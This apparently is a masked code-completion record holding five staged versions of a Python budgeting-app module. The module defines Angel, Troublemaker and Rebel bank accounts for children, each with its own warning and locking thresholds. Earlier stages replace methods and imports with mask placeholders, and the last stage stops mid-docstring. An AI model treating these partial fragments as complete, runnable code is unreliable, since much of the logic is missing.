"step-1": "<mask token>\n\n\nclass AngelBankAccount(BankAccount):\n <mask token>\n <mask token>\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. 
Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. 
\n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-2": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n <mask token>\n\n def get_budgets(self) ->list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n <mask token>\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. 
These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. 
Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. 
\n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-3": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n <mask token>\n <mask token>\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n <mask token>\n\n def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int\n ) ->None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(\n f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'\n )\n <mask token>\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) ->list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction for transaction in self.transactions if \n transaction.budget_category == category]\n\n def get_budgets(self) ->list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n <mask token>\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. 
The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. 
These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. 
Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. 
\n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-4": "<mask token>\n\n\nclass BankAccount(ABC):\n <mask token>\n\n def __init__(self, bank_account_no: str, bank_name: str, bank_balance:\n float, budget_manager: BudgetManager):\n \"\"\"\n Initializes a bank account.\n :param bank_account_no: a string\n :param bank_name: a string\n :param bank_balance: a float\n :param budget_manager: a BudgetManager\n \"\"\"\n self.bank_account_no = bank_account_no\n self.bank_name = bank_name\n self.bank_balance = bank_balance\n self.transactions = []\n self.budget_manager = budget_manager\n self._locked = False\n\n def record_transaction(self, transaction: Transaction) ->bool:\n \"\"\"\n Records a transaction and returns True if this transaction is\n recorded successfully. A transaction is recorded successfully\n when this bank account is not locked, has enough balance, and\n the budget associated with the transaction is not locked.\n :param transaction: a Transaction, the transaction to record\n :return: a bool, True if record successfully, False otherwise\n \"\"\"\n if self._locked:\n print('Failed to record transaction! Your account has been locked!'\n )\n return False\n if transaction.amount > self.bank_balance:\n print('Failed to record transaction! Not enough balance!')\n return False\n budget = self.budget_manager.get_budget(transaction.budget_category)\n if budget.locked:\n print('Failed to record transaction! This budget has been locked!')\n return False\n self.transactions.append(transaction)\n self.bank_balance -= transaction.amount\n budget.amount_spent += transaction.amount\n self._warn_and_lock_if_needed(transaction)\n return True\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. 
The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n\n def print_transactions_for_review(self, budget: Budget) ->None:\n \"\"\"\n Prints a list of transactions in the given budget for review.\n :param budget: a Budget\n :return: None\n \"\"\"\n print(\n f'Please review the following transactions in the {budget.name} budget:'\n )\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)\n\n def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int\n ) ->None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(\n f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'\n )\n\n def _notify_exceeded_budget(self, budget: Budget) ->None:\n \"\"\"\n Notifies the user that they've just exceeded this budget.\n :param budget: a Budget, the budget that they've just exceeded\n :return: None\n \"\"\"\n print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) ->list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction for transaction in self.transactions if \n transaction.budget_category == category]\n\n def get_budgets(self) ->list:\n 
\"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n\n def __str__(self):\n transactions_info = ''\n for transaction in self.transactions:\n transactions_info += f'{transaction}\\n'\n if len(transactions_info) == 0:\n transactions_info = \"You haven't made any transaction yet.\\n\"\n return f\"\"\"*** Bank Account Details ***\n• Bank account number: {self.bank_account_no}\n• Bank name: {self.bank_name}\n• Status: {'Locked' if self._locked else 'Available'}\n• Transactions:\n{transactions_info}• Closing balance: ${self.bank_balance}\"\"\"\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. 
These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. 
Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. 
\n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-5": "\"\"\"\nThis module contains the class definitions for all types of BankAccount\nalongside BankAccountCreator as a supporting class to create an\nappropriate bank account for a given user type.\n\"\"\"\n\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom transaction import Transaction\nfrom budget import Budget\nfrom budget import BudgetManager\nfrom budget import BudgetCategory\nfrom budget import BudgetCreator\nfrom user import UserType\n\n\nclass BankAccount(ABC):\n \"\"\"\n An abstract base class that represents a bank account. By default,\n all bank accounts have:\n - a bank account number\n - a bank name\n - a bank balance\n - a budget manager to manage budgets\n - a list of transactions\n - a locked state to determine whether this account is locked.\n \"\"\"\n\n def __init__(self, bank_account_no: str, bank_name: str,\n bank_balance: float, budget_manager: BudgetManager):\n \"\"\"\n Initializes a bank account.\n :param bank_account_no: a string\n :param bank_name: a string\n :param bank_balance: a float\n :param budget_manager: a BudgetManager\n \"\"\"\n self.bank_account_no = bank_account_no\n self.bank_name = bank_name\n self.bank_balance = bank_balance\n self.transactions = []\n self.budget_manager = budget_manager\n self._locked = False\n\n def record_transaction(self, transaction: Transaction) -> bool:\n \"\"\"\n Records a transaction and returns True if this transaction is\n recorded successfully. A transaction is recorded successfully\n when this bank account is not locked, has enough balance, and\n the budget associated with the transaction is not locked.\n :param transaction: a Transaction, the transaction to record\n :return: a bool, True if record successfully, False otherwise\n \"\"\"\n if self._locked:\n print('Failed to record transaction! Your account has been locked!'\n )\n return False\n\n if transaction.amount > self.bank_balance:\n print('Failed to record transaction! 
Not enough balance!')\n return False\n\n budget = self.budget_manager.get_budget(transaction.budget_category)\n if budget.locked:\n print('Failed to record transaction! This budget has been locked!')\n return False\n\n self.transactions.append(transaction)\n self.bank_balance -= transaction.amount\n budget.amount_spent += transaction.amount\n self._warn_and_lock_if_needed(transaction)\n return True\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n\n def print_transactions_for_review(self, budget: Budget) -> None:\n \"\"\"\n Prints a list of transactions in the given budget for review.\n :param budget: a Budget\n :return: None\n \"\"\"\n print(f'Please review the following transactions in the {budget.name} '\n f'budget:')\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)\n\n def _warn_nearing_exceed_budget(self, budget: Budget,\n exceeded_percent: int) -> None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(f'[WARNING] You are about to exceed the {budget.name} budget! 
'\n f'You went over {exceeded_percent}% of the total '\n f'${budget.total_amount}.')\n\n def _notify_exceeded_budget(self, budget: Budget) -> None:\n \"\"\"\n Notifies the user that they've just exceeded this budget.\n :param budget: a Budget, the budget that they've just exceeded\n :return: None\n \"\"\"\n print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')\n\n def _lock_budget(self, budget: Budget) -> None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) -> list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction\n for transaction in self.transactions\n if transaction.budget_category == category]\n\n def get_budgets(self) -> list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n\n def __str__(self):\n transactions_info = ''\n for transaction in self.transactions:\n transactions_info += f'{transaction}\\n'\n if len(transactions_info) == 0:\n transactions_info = \"You haven't made any transaction yet.\\n\"\n return f'*** Bank Account Details ***\\n' \\\n f'• Bank account number: {self.bank_account_no}\\n' \\\n f'• Bank name: {self.bank_name}\\n' \\\n f'• Status: {\"Locked\" if self._locked else \"Available\"}\\n' \\\n f'• Transactions:\\n' \\\n f'{transactions_info}' \\\n f'• Closing balance: ${self.bank_balance}'\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. 
The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. 
These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. 
Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n\n _user_type_mapper = {\n UserType.ANGEL: AngelBankAccount,\n UserType.TROUBLEMAKER: TroublemakerBankAccount,\n UserType.REBEL: RebelBankAccount,\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. 
